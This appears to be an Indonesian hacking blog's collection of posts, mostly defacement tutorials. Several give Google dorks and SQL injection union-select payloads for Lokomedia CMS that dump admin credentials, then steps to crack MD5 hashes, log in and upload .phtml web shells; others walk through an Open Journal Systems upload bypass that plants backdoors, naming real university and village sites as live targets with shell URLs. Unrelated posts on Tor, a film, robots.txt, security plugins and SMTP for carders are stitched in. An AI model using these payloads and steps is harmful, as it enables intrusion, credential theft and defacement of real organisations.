Selamat pagi semua :D pagi ini saya akan berbagi Tutorial Deface Dengan SQL Lokomedia :D Langsung Aja Cekidot..
Dork : - Inurl:kategori-23-hiburan.html
- Inurl:hal-tentang-kami.html
- Inurl:statis-1-pengantar.html
- Inurl:statis-19-beasiswa.html
- Inurl:statis-22-kerjasama.html
*Kembangin biar jos :v
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
Pertama masukin dork di pencarian seperti Google dan Bing, Lalu pilih target sesuka kalian, kali ini target saya adalah http://desaponggok.id/ .
Kemudian masukan exploit sehingga menjadi seperti http://desaponggok.id/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html.
Sekarang sudah kelihatan user sama passwordnya di bagian title :v kemudian ctrl+u untuk melihatnya lebih jelas.
Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password admin.
Untuk login biasanya di :
- http://site/admin
- http://site/adminweb
- http://site/administrator
- http://site/redaktur
Kali ini loginnya berada di http://desaponggok.id/adminweb/
, Kemudian masukan user dan pass di form. Dan hasilnya seperti ini
Untuk mengupload shell bisa dibagian Download, seperti ini
Untuk mengakses shell biasanya di http://site/files/shellmu
*Shell harus berekstensi .phtml
Sekian dan terima kasih.
Selamat siang semua :D kali ini saya akan berbagi tutorial deface yang lagi tren yaitu Open Journal Systems (OJS) dengan target kebanyakan website Universitas di Indonesia.
Dorknya : inurl:/index.php/index/user/register
*kembangin lagi biar jos :D
Yang harus disiapkan yaitu sebuah shell dengan ukuran kecil seperti Galerz / IndoXploit yang ekstensinya diubah menjadi .phtml, Contoh : lerz.phtml / ix.phtml.
Live Target kali ini adalah Universitas Jember beralamat :
http://jurnal.unej.ac.id/index.php/index/user/register
Pertama pilih journal untuk register, saya akan pilih yang
paling atas.
Kemudian isi form yang hanya diberi tanda * untuk
mempercepat. Lalu dibagian bawah jadikan centang seperti
berikut.
Kemudian klik register.
Dibagian ini klik New Submission yang ada disebelah kanan.
Centang semua seperti gambar kemudian klik save and continue.
Kemudian upload shell kalian yang berekstensi .phtml
Ingat File Name shell kalian dan pada bagian depan yaitu 2788 merupakan IDnya.
Untuk akses shell seperti ini :
http://jurnal.unej.ac.id/files/journals/1/articles/2788/submission/original/2788-5614-1-SM.phtml
Author : GadiZ ft M0J4NG_PR!4/VGN
Sekian dan terima kasih.
Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.
Assalamualaikum Wr.Wb
siang ini ane mau post tentang exploit magento gan :D masih rame ni exploit ini . langsung saja
sebelumynyaa exploit ini sudah di publish di web fatoni.id/malangXploit.php dengan buatan / Coded by Syncronyzer.
dengan penambahan fitur sedikit berupa:
Cek Filesystem
Cek Downloader
ini dia Penampakannya
Hai Gan Assalamualaikum :) ,, kali ini mau share tntang film Conjuring2 nih :'v itu loh yg lagi tenar tntang hantu Conjuring2 yg namanya valak :'v
INFO :
Released10 Juni 2016
Country
USA
Language
English
Genre
Horror
Directors
James Wan
Deface Teknik SQLi Cms Lokomedia
Alat-Alat Tempur!
# Dork :
Inurl:/-ekonomi.html
Inurl:/hubungi-kami.html
Inurl:/adminweb/ CMS Lokomedia
( Kembangkan Lagi Dorking Nyaaa.... )
# Exploit :
http://localhost/kategori-(Nomer)'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-JudulKategori.html
Tambahin Strip 1 Lagi Di Belakang Nomer , Jadi 2 Stript (--) :)
Jadi :
http://localhost/kategori--(Nomer)'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-JudulKategori.html
Setelah Di Exploit , Kalau Error , Cari Folder Atau Judul Lain Atau Cari Target Lain!
Kalau Berhasil Di Exploit , Nanti Tab-Bar Akan Berubah Kayak Ada Nomer MD5 Gituuu!
Setelah Itu , Lu Klik CTRL+U Atau Klik Kanan-ViewSource!
Cari Nomor Panjang Tersebut (MD5) , Lalu Buka Tab Baru !
Pergi Ke : WWW.HashKiller.Co.Uk/Md5-Decrypter.Aspx
Setelah Lu Crack MD5 Tadi , Nanti Lu Akan Tau Apa Password Pada MD5 Tersebut!
Lalu Pergi Ke Admin Login Target Lu !
Www.Localhost.Com/ adminweb /
Www.Localhost.Com/ admin /
Www.Localhost.Com/ administrator /
Masukan Username & Password (MD5) Di Kolom Login :)
Username : admin
Password : (Hasil Crack MD5 Yang Tadi)
Mau Lihat Full Tutorial + Tanem Shell ???
Yukkk Intip Video Ini :*

Akhir - akhir ini sudah banyak orang yg bisa mengakses deep web dari HH (android) mereka dan memamerkan screeshot hidden wiki di account social media mereka. Kecanggihan android memang sudah tidak diragukan lagi bahkan system pada android hampir menyamai system pada pc oleh karena itu apa yg bisa anda lakukan di pc anda sekarang anda juga bisa lakukan di android anda.
Dan yang akan kita bahas kali adalah Bagaimana Cara Mengakses Deep Web langsung dari Android? bagi yang belum tau apa itu deep web silakan baca terlebih dulu Deep Web Internet Yang Tak Nampak, karena sebelum mengakses deepweb sebaiknya anda mengenal dulu seperti apa itu deep web.
Untuk mendapatkan akses Tor anda memerlukan 3 aplikasi lainnya dan sebelum itu pastikan bahwa android anda sudah dalam keadaan Root Bagi yang androidnya belum di root silakan baca artikel saya sebelumnya Cara Root Semua Jenis Android. Jika sudah mari simak tutorial berikut:
Install Orwall
OrWall adalah sebuah firewall untuk Android Anda yang akan memaksa semua aplikasi (atau hanya yang Anda pilih) untuk menggunakan jaringan TOR untuk mengirimkan semua data-data nya. Dan jika salah satu dari aplikasi tersebut tidak dapat menggunakan jaringan TOR untuk mengakses internet, maka koneksi data akan diblokir.

Setelah menginstal OrWall, selesaikan program pemandu setup dan reboot Android Anda untuk mengaktifkan proses pada latar belakang. Setelah Anda selesai mereboot Android anda , kemudian anda dapat membuka Aplikasi OrWall untuk mulai memilih aplikasi mana yang Anda inginkan untuk dapat menggunakan jaringanTOR.
Install Orbot
Orbot adalah penghubung antara perangkat Anda dan jaringan TOR. Hal ini memfasilitasi berjalannya data dari aplikasi ke jaringan TOR, tetapi hanya dapat melakukannya dengan aplikasi yang mendukung data yang dikirim melalui proxy . Karena keterbatasannya itu, penting untuk memiliki Orbot dan OrWall untuk diinstal pada perangkat Anda, karena OrWall akan dibutuhkan oleh aplikasi yang tidak memiliki dukungan proxy .

Pertama kali Anda membuka aplikasi tersebut setelah di instal, Anda harus menyelesaikan wizard pengaturan terlebih dahulu, namun setelah itu, yang harus Anda lakukan adalah menekan lama tombol Daya untuk mengaktifkan Orbot. Jika suatu saat Anda ingin mengubah Tor Identity Anda ke IP address yang berbeda, Anda dapat menggulir pada layar utama, yang akan berguna jika Anda tidak ingin terlalu lama menyimpang dari IP address yang sama.
Install Orweb
Dan langkah adalah Terakhir, kita memiliki sebuah browser yang juga berasal dari pengembang yang menciptakan Orbot yaitu The Guardian Project , disebut Orweb . Sementara Orbot sendiri akan menciptakan koneksi ke jaringan TOR, Orweb inilah yang akan menjadi alat dan memungkinkan Anda menggunakannya untuk menjelajahi web.
Karena data Anda akan berputar melewati sebuah labirin yang besar dan luas dari server TOR internasional, karena itu Anda akan merasakan koneksi Anda seperti melambat, namun harus disadari bahwa ini adalah sebuah harga yang harus dibayar untuk sebuah anonimitas total.
Sebagai bonus tambahan, Orweb juga dapat mem- bypass sebagian besar suatu pembatasan pada sebuah jaringan sehingga Anda akhirnya akan mendapatkan keuntungan tersendiri, yaitu akses yang bebas bahkan mungkin akan dapat melewati sebuah firewall jaringan pada kantor Anda.
Tidak ada setup yang diperlukan untuk memulai menggunakan Orweb , Anda cukup buka aplikasi dan menunggu homepage untuk menampilkan pesan "sukses" yang akan memberitahu Anda bahwa Aplikasi tersebut telah terhubung ke jaringan TOR.
The Guardian Project juga telah mengerjakan sebuah versi perbaikan dari Orweb bernama Orfox , yang menambahkan fitur seperti tabbed browsing dan cara untuk meminta versi mobile pada sebuah website.

Dan Sekarang Anda adalah ANONIM karena dengan ketiga aplikasi tersebut anda bisa menyimpan data anda dengan aman, Namun saya tidak bisa menjamin 100% keamanan data anda karena banyaknya kasus pembobolan dan sementara tor hanya membuat kehadiran online anda ANONIM untuk menjelajah internet.
Hello Whans Up :'v Assalamualaikum wr wb :D
kali ini ane mau share Tutorial Deface Open Jurnal System File Upload ,,
bagi yg blm tau baca disini gan Disini .
Next
LIVE TARGET kali ini yaitu UBAYA ( Universitas Surabaya )
Setelah itu, Pertama kita harus registrasi terlebih dahulu di Journal online tersebut, lalu Login :)
Eksekusi Target
Exploit Title : Open Journal Systems File Upload
Bug Type : File Upload
Vendor : http://openjournalsystems.com/
Author : Unknown7
Proof of concept :
Buat Submission baru,
Step 1, Save and continue
Step 2, Upload submission file
Bypass file extension [ .phtml ] lalu upload backd00r kamu :)
Setelah Sukses upload backd00r, mari kita akses backd00r yang telah kita tanam ke website korban
File Acces : /files/journals/1/articles/[ ID User ]/submission/original/[ ID User - ID File .phtml ]
Contoh :
Submission File
File name 1273-3741-1-SM.phtml
Original file name nyan.phtml
File size 88KB
Date uploaded 2016-06-21 10:17 PM
Done :
http://journal.ubaya.ac.id/files/journals/1/articles/1273/submission/original/1273-3741-1-SM.phtml
backd00r kita sudah tertanam :D
untuk yang masih Kebingungan tentang exploit ini bisa Nanya ke saya Disini
hehehe
Setelah itu terserah kalian mau bagaimana selanjutnya hehehhe
GreeTz :
Rabbit Security Team And Indonesian Cyber Freedom
Hello Was Up :'v
Kali ini mau bahas templat web official-unknown7 ni yap simak aja lgsung :D
Evo Magz Template merupakan template premium yang keren dan responsive, template yang di buat oleh Mas Sugeng khusus buat para blogger. Mengapa ? karena template ini cocok buat Adsense loh. Mau tau apa yang membuat template ini keren ?
- 100% Responsive Web Design
- Costom Mobile Template
- SEO Optimized
- Ad & AdSense Optimized
- Fast Loading
- Full Customizable
- 100% Responsive
- Custom Mobile Version
- SEO Optimized
- Ads Optimized
- Fully Customizable
- Font Awesome Ready
- Breadcrumb Navigation
- Auto Readmore
- Related Posts Widget
- Share Buttons
- Tab View Widget
- Recent Post Widget
- Numbered Page Navigation
- Back to Top button
- Custom Error page
- Facebook Comments (new)
- dan lainnya
Bila Anda memiliki blog/website berbasis WordPress self-hosted, maka membuat robot.txt dan menguploadnya ke Google Webmaster Tools merupakan salah kewajiban untuk diterapkan. Membuat robot.txt wordpress pada umumnya bertujuan untuk memperbolehkan rayapan robot Google dan menolak rayapan robot jahat atau spammer yang hendak menyebarkan malware atau hack blog kita.
Dengan membuat robot.txt pada blog, maka kita memberi isyarat bagi robot google pada blog kita untuk memberi akses rayapan ke robot tertentu yang kita izinkan, dan menolak akses dari robot manapun yang tidak kita beri izin akses.
Selain itu robot.txt juga berguna untuk SEO, di mana setiap artikel di blog kita akan lebih mudah dan lebih cepat terindeks di mesin pencari Google.
Baca Juga: 7 Plugin WordPress Untuk Menganalisa Keamanan Website Anda
Cara membuat robot.txt sangatlah sederhana dan mudah. Anda tinggal menginstall plugin KB Robot.txt di menu Plugins => Add New => dan Search dengan nama tersebut. Install dan aktifkan plugin tersebut
Setelah selesai diaktifkan, maka buka menu Setting => KB Robot.tx . Setelah itu Anda diminta untuk memasukkan penggalan kode akses kepada robot yang diizinkan untuk mengakses situs Anda, yaitu robot Google. Masukkan kode berikut ini:
User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content
User-agent:
Mediapartners-Google
Allow: /
User-agent: Adsbot-Google
Allow: /
User-agent: Googlebot-
Image
Allow: /
User-agent: Googlebot-
Mobile
Allow: /
Sitemap: http://situsanda.com /sitemap.xml
Note: Jika Anda membuat
XML Sitemap blog Anda dengan bantuan plugin WordPress SEO by Yoast , maka ganti alamat sitemap Anda menjadi http://www.situsanda.com/sitemap_index.xml.
Itulah tadi cara membuat robot.txt pada website yg berguna untuk SEO atau mengatasi kesalahan perayapan dan mencegah robot lain yg berniat mengganggu website anda. Semoga bermanfaat.
Tidak semua hacker meretas atau mendeface sebuah website dengan Injection Langsung, ada juga yg memanfaatkan celah atau bahkan plugin gratisan yang tidak kredibel, apalagi theme premium yang tersebar bebas di internet. Semua bisa jadi sudah disisipi script jahat yang berpotensi membuat website Anda merugi. Oleh karena sering - seringlah anda melakukan pengecekan pada website anda tersebut anda juga bisa menggunakan beberapa plugin untuk mengecek apakah di website anda ada script berbahaya atau tidak, dan berikut plugin - pluginnya:
1. Theme Authenticity Checker (TAC)
Theme Authenticity Checker(TAC) merupakan
plugin pertama yang perlu dicoba untuk
memeriksa kode berbahaya pada theme yang
Anda gunakan.
TAC sangat bagus karena plugin ini melakukan
pengecekatan terhadap Base64 dan link
tersembunyi di footer, tempat dimana sebagian
besar kode berbahaya disisipkan.
Jika plugin ini berhasil mendeteksi kode
berbahaya, maka dia akan memberikan laporan
kepada Anda sehingga bisa diambil tindakan
selanjutnya untuk mengamankan website.
2. Sucuri Security
Sucuri Security adalah plugin keren namun gratis
yang bisa melakukan scanning terhadap instalasi
WordPress Anda dan memberikan Anda laporan
terperinci. plugin ini juga menawarkan firewall
untuk melindungi situs terhadap ancaman
eksternal.
3. AntiVirus for WordPress
Pengguna komputer biasa menginstall anti virus
di komputernya, bukan hanya komputer desktop,
namun tablet dan ponsel juga. Namun
bagaimana dengan situs wordpress?
WordPress juga memiliki AntiVirus berupa plugin
yang bisa Anda gunakan. Hal ini tentu saja akan
memeriksa situs Anda dari kode berbahaya dan
sekaligus mengamankannya.
Pengaturan juga bisa dilakukan untuk melakukan
scanning harian. Download Antivirus for
WordPress disini.
4. Exploit Scanner
Exploit Scanner
adalah salah satu plugin
WordPress terbaik untuk masalah keamanan.
Plugin ini melakukan scan semua bagian dari
WordPress untuk ancaman potensial dan
melaporkan Anda terkait hal tersebut.
Satu-satunya kekurangan dari plugin yang
menawarkan hanya fasilitas pelaporan dan Anda
harus mengurus sendiri ancaman yang ditemukan
oleh plugin ini. Plugin ini dapat membantu Anda
jika Anda memiliki ahli keamanan di sisi Anda
atau jika Anda mengerti bisa juga diatasi sendiri
dengan kemampuan Anda. Plugin ini bisa
dibilang hanya informan saja.
5. WordFence Security
WordFence Security adalah plugin keamanan
favorit banyak pengguna wordpress. Alasannya
adalah bahwa plugin ini merupakan paket
lengkap dan Anda tidak perlu melihat ke plugin
keamanan lain. Plugin ini juga mengirimi Anda
email langsung tentang kegiatan berbahaya atau
update yang terjadi.
Hal ini juga memastikan bahwa percobaan login
diblokir dan juga mengirimkan email ketika
administrator login ke website.
Plugin ini bebas biaya namun mereka juga
menawarkan fitur yang lebih lengkap jika Anda
bersedia membayar.
6. Anti-Malware and Brute-Force
Security by ELI
Anti-Malware WordPress adalah plugin khusus
untuk mendeteksi ancaman, virus, hal berbahaya
dalam instalasi WordPress Anda.
Plugin ini menawarkan berbagai jenis scan untuk
website WordPress Anda seperti scan lengkap
secara keseluruhan, scan yang sebagian dan
banyak lagi.
Selain itu, plugin ini juga menawarkan
penghapusan otomatis ancaman dan membantu
Anda menjaga website Anda dalam kondisi
prima. Hal ini juga melakukan scan script pintu
belakang / backdoor.
7. Quttera Web Malware Scanner
Quttera Web Malware Scanner adalah plugin khusus WordPress yang menangai masalah
perawatan dari semua kegiatan berbahaya dalam
situs web Anda. Plugin ini adalah alat yang cukup bagus untuk mendeteksi malware, link eksternal, signature , dan pattern . Hal ini didasarkan pada teknologi cloud dan juga menawarkan status blacklist sehingga Anda dapat memeriksa apa yang diblokir. Setelah scan, Anda akan diberikan laporan investigasi rinci, penuh dengan informasi yang diperlukan untuk membuat Anda up to date terhadap masalah website Anda. Plugin ini gratis untuk digunakan.
Dah segitu dulu ^_^ :*
udah ya Wassalamualaikum :*
Assalamualaikum ..
Hai Gann , Ketemu again ni sama gua :'v penulis noob :D :'(
kali ini ane akan bahas Tutorial Membuat SMTP ( Simple Mail Tramsfer Protocol )
bagi anak2 16 digit ( CARDER ) pasti tau dong kegunaanya . langsung sj cekidot
Okeee Gan Sekian Dari Gua Moga2 Paham Yaa.
Dibikin Happy Aja Gan :'v jehahaha :v
Bye2 Sampai Ketemu Lagi
Wassalamualaikum.





















